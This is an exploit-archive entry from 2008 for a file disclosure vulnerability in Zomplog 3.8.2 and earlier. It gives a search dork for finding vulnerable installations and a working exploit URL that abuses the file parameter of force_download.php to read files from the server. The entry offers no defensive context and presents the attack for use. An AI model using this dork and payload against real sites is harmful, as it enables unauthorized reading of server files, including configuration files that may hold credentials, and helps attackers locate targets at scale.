id: 3032
date: 05/15/2008
title: Zomplog <= 3.8.2 (force_download.php) File Disclosure Vulnerability
author: Stack
cves: 

===================================================================
Zomplog <= 3.8.2 (force_download.php) File Disclosure Vulnerability
===================================================================



Name:  "Zomplog 3.8.2 <= file disclouse"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: Stack-Terrorist

Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
 
thnx : alah


#  0day.today [2023-03-27]  #